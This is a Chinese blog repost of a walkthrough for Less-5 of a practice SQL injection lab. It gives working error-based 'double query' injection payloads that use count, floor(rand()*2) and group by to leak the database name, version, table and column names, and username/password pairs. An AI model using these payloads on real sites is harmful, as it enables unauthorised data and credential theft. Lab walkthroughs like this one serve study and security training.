当前位置：首页 > 编程日记 > 正文

SQLI DUMB SERIES-5

编程日记 2024-12-24 05:40:00

less5

（1）输入单引号，回显错误，说明存在注入点。输入的Id被一对单引号所包围，可以闭合单引号

（2）输入正常时：?id=1

说明没有显示位，因此不能使用联合查询了；可以使用报错注入,有两种方式

（3）双注入查询

参考资料：http://www.2cto.com/article/201303/192718.html

简单的说，使用聚合函数进行双注入查询时，会在错误信息中显示一部分错误信息,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

1）爆数据库名

?id=-1' union select count(*),count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a--+

可知表明数据库名为"security"

2)将上述中的database(),改为version(),可得PHP版本

3）同样的方法可以爆用户名

4)爆表名

?id=-1' union select count(*),count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a--+

改变Limit后面的数字可以爆出所有表名,例如

5）爆列名（以user表为例）

?id=-1' union select count(*),count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+

改变Limit后面的数字可以爆出所有列名,例如

6）爆字段

?id=-1' union select count(*),count(*),concat((select concat_ws('[',password,username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+

Password与username之间用'['隔开，同样改变Limit后面的数字可以爆出user表的所有字段。

转载于:https://www.cnblogs.com/momoli/p/10463358.html

https://www.dkcj.cn/info/33186.html

javascript RegExp

http://www.w3schools.com/jsref/jsref_obj_regexp.asp声明-------------modifiers：{i,g,m}1. var pattnew RegExp(pattern,modifiers);2. var patt/pattern/modifiers;------------------------例子：var str "Visit W3Schools"; //两…

编程日记2024/12/24 05:30:00

Ubuntu14.04 64位机上安装OpenCV2.4.13(CUDA8.0)版操作步骤

Ubuntu14.04 64位机上安装CUDA8.0的操作步骤可以参考http://blog.csdn.net/fengbingchun/article/details/53840684，这里是在已经正确安装了CUDA8.0的基础上安装OpenCV2.4.13(CUDA8.0)操作步骤：1. 从http://opencv.org/downloads.html 下载OpenCV2.…

编程日记2024/12/24 05:20:00

一篇文章能够看懂基础代码之CSS

web页面主要分为三块内容：js：控制用户行为和执行代码行为html元素：控制页面显示哪些控件（例如按钮，输入框，文本等）css：控制如何显示页面上的空间，例如布局，颜…

编程日记2024/12/24 05:10:00

谷歌NIPS论文Transformer模型解读：只要Attention就够了

作者 | Sherwin Chen译者 | Major，编辑 | 夕颜出品 | AI科技大本营（ID:rgznai100）导读：在 NIPS 2017 上，谷歌的 Vaswani 等人提出了 Transformer 模型。它利用自我注意（self-attention）来计算其…

编程日记2024/12/24 05:00:00

中国移动与苹果联姻三星在华霸主地位或遭取代

据国外媒体12月24日报道，在各方的期待下，苹果终于宣布中国移动将于2014年1月17日开始销售支持其网络的iPhone手机。而中国移动也将于12 月25日开始正式接受预定。作为中国以及世界最大的移动运营商，中国移动与苹果的合作，将会帮助…

编程日记2024/12/24 04:50:00

二维码Data Matrix编码、解码使用举例

二维码Data Matrix的介绍见： http://blog.csdn.net/fengbingchun/article/details/44279967 ，这里简单写了个生成二维码和对二维码进行识别的测试例子，如下：int test_data_matrix_encode() {std::string str "中国_abc_DEF…

编程日记2024/12/24 04:40:00

PDF文件如何转成markdown格式

百度上根据pdf转makrdown为关键字进行搜索，结果大多数是反过来的转换，即markdown文本转PDF格式。但是PDF转markdown的解决方案很少。正好我工作上有这个需求，所以自己实现了一个解决方案。下图是一个用PDF XChange Editor打开的PDF文件&am…

编程日记2024/12/24 04:30:00

关于SAP BW提示“Carry out repairs in non-original only

为什么80%的码农都做不了架构师？>>> 这个提示是由于你在生产系统（正式系统）里面修改了一些东西，才提示"Carry out repairs in non-original system only if they are urgent"这个警告，理论上我们…

编程日记2024/12/24 04:20:00

windows7 64位机上安装配置CUDA7.5(或8.0)+cudnn5.0操作步骤

按照官网文档 http://docs.nvidia.com/cuda/cuda-installation-guide-microsoft-windows/index.html#axzz4TpI4c8vf 进行安装：在windows7上安装cuda8.0/cuda7.5的系统需求：(1)、ACUDA-capable GPU(本机显卡为GeForce GT 640M)；(2)、A support…

编程日记2024/12/24 04:10:00

多重影分身：一套代码如何生成多个小程序？

前言影分身术，看过火影的都知道，一个本体，多个分身。大家肯定要问了，那小程序开发跟影分身术也能扯上关系？没错，那自然就是：一套代码，多个小程序啦。各位先别翻白眼，且…

编程日记2024/12/24 04:00:00

TensorFlow全家桶的落地开花 | 2019 Google开发者日

作者 | 唐小引写于上海世博中心出品 | GDD 合作伙伴 CSDN（ID：CSDNnews）Android 10 原生支持 5G，Flutter 1.9、Dart 2.5 正式发布这是 Google Developer Days 在中国的第四年，从 2016 年 Google Developers 中国网站正式…

编程日记2024/12/24 03:50:00

css的background

背景属性——background是css中的核心属性。你应该对它有充分的了解。这篇文章详细讨论了background的所有相关属性，甚至包括background-p_w_upload，还为我们介绍了它在即将到来的CSS3中的样子，还有那些新加入的背景属性。使用CSS2中的背景属…

编程日记2024/12/24 03:40:00

windows7 64位机上配置支持GPU版(CUDA7.5)的OpenCV2.4.13操作步骤

很久之前在windows7 32位上配置过GPU版的opencv，可参考http://blog.csdn.net/fengbingchun/article/details/9831837Windows7 64位CUDA7.5的配置可以参考：http://blog.csdn.net/fengbingchun/article/details/53892997这里是在CUDA7.5已正确安装后的操作…

编程日记2024/12/24 03:30:00

值得注意的知识点

ImageView的属性adjustViewBounds www.jianshu.com/p/13de17744… 转载于:https://juejin.im/post/5c8b7742e51d454e02716e44

编程日记2024/12/24 03:20:00

阿里深度序列匹配模型SDM：如何刻画大型推荐系统的用户行为？

作者 | 石晓文来源 | 小小挖掘机（ID：wAIsjwj）今天给大家介绍的论文是：《SDM: Sequential Deep Matching Model for Online Large-scale Recommender System》论文下载地址：https://arxiv.org/abs/1909.00385v11、背景像…

编程日记2024/12/24 03:10:00

find ip from hostname or find hostname from ip

1. find ip from hostname ping <hostname> 2.fin hostname from ip nslookup <ip>

编程日记2024/12/24 03:00:00

Linux下多线程编程中信号量介绍及简单使用

在Linux中有两种方法用于处理线程同步：信号量和互斥量。线程的信号量是一种特殊的变量，它可以被增加或减少，但对其的关键访问被保证是原子操作。如果一个程序中有多个线程试图改变一个信号量的值，系统将保证所有的操作都将依次进行…

编程日记2024/12/24 02:50:00

Linux环境HBase安装配置及使用

Linux环境HBase安装配置及使用 1. 认识HBase (1) HBase介绍 HBase Hadoop database，Hadoop数据库开源数据库官网：hbase.apache.org/HBase源于Google的BigTableApache HBase™是Hadoop数据库，是一个分布式，可扩展的大数据存储。当…

编程日记2024/12/24 02:40:00

适合小团队作战，奖金+招聘绿色通道，这一届算法大赛关注下？

大赛背景伴随着5G、物联网与大数据形成的后互联网格局的逐步形成，日益多样化的用户触点、庞杂的行为数据和沉重的业务体量也给我们的数据资产管理带来了不容忽视的挑战。为了建立更加精准的数据挖掘形式和更加智能的机器学习算法，对不断生成的用户行为事…

编程日记2024/12/24 02:30:00

Linq 集合处理(Union)

关于Union的两种情况一、简单值类型或者string类型处理方式(集合需要实现IEnumerable接口) #region int类型List<int> ints1 new List<int> { 1, 2, 3, 4, 5, 6 };List<int> ints2 new List<int> { 5, 6, 7, 8, 9, 0 };IEnumerable<int> ints…

编程日记2024/12/24 02:20:00

卷积神经网络中十大拍案叫绝的操作

作者 | Justin ho来源 | 知乎CNN从2012年的AlexNet发展至今，科学家们发明出各种各样的CNN模型，一个比一个深，一个比一个准确，一个比一个轻量。下面会对近几年一些具有变革性的工作进行简单盘点，从这些充满革新性的工作…

编程日记2024/12/24 02:10:00

windows7下解决caffe check failed registry.count(type) == 1(0 vs. 1) unknown layer type问题

在Windows7下调用vs2013生成的Caffe静态库时经常会提示Check failed: registry.count(type) 1 (0 vs. 1) Unknown layer type的错误，如下图：这里参考网上资料汇总了几种解决方法：1. 不使用Caffe的静态库，直接将Caffe的sourc…

编程日记2024/12/24 02:00:00

js 变量提升和函数提升

2019独角兽企业重金招聘Python工程师标准>>> 创建函数有两种形式，一种是函数声明，另外一种是函数字面量，只有函数声明才有变量提升 console.log(a) // f a() { console.log(a) } console.log(b) //undefinedfunction a() {consol…

编程日记2024/12/24 01:50:00

.net_ckeditor+ckfinder的图片上传配置

CKEditor和CKFinder的最新版可以到官方网站（http://cksource.com）上下载获得。把以上两个资源放到网站的根目录： /CKEditor 和 /CKFinder (不区分大小写) 在页面使用 CKEditor： <textarea cols"80" id"prcont…

编程日记2024/12/24 01:40:00

VS2013在Windows7 64位上变慢的解决方法

重装了windows7系统，又重装了vs2013，发现在打开vs2013、编译工程及调试的时候，vs2013都会变的比较慢，参考网上资料，这里列出几种可能的解决方法： 1. 打开工具--> 选项 --> 源代码管理 --> 插件选…

编程日记2024/12/24 01:30:00

Key-Value数据库：Redis与Memcached之间如何选择？

华为云分布式缓存Redis5.0和Memcached都是华为云DCS的核心产品。那么在不同的使用场景之下，如何选择Redis5.0和Memcached呢？ 就由小编为大家进行详细的数据对比分析吧Redis和Memcached都是非常受欢迎的开源内存数据库，相对关系型数据库&…

编程日记2024/12/24 01:20:00

裴健等9名华人当选加拿大皇家学会院士

【导读】近日，加拿大皇家学会（RSC，The Royal Society of Canada）官网宣布已评选出今年的新增院士。其中，京东副总裁、加拿大西蒙弗雷泽大学计算科学学院教授裴健和其他 8 名华人学者均在这份名单之中，而裴健…

编程日记2024/12/24 01:10:00

Linux中shell命令的用法和技巧

使用Linux shell是我每天的基本工作，但我经常会忘记一些有用的shell命令和l技巧。当然，命令我能记住，但我不敢说能记得如何用它执行某个特定任务。于是，我开始在一个文本文件里记录这些用法，并放在我的Dropbox里&#…

编程日记2024/12/24 01:00:00

Caffe中Layer注册机制

Caffe内部维护一个注册表用于查找特定Layer对应的工厂函数(Layer Factory的设计用到了设计模式里的工厂模式)。Caffe的Layer注册表是一组键值对(key, value)( LayerRegistry里用map数据结构维护一个CreatorRegistry list, 保存各个Layer的creator的函数句柄)，key为L…

编程日记2024/12/24 00:50:00

自动驾驶行业观察 | 停车不再难，L2到L4的泊车辅助系统技术剖析

作者 | 陈光来源 | 自动驾驶干货铺（ID:IntelligentDrive）【导读】在汽车智能化的浪潮中，车载传感器发展迅速，越来越多搭载了先进传感器的汽车进入了我们的视野。比如能够在高速公路上实现单车道巡航的凯迪拉克CT6，以及…

编程日记2024/12/24 00:40:00

相关文章：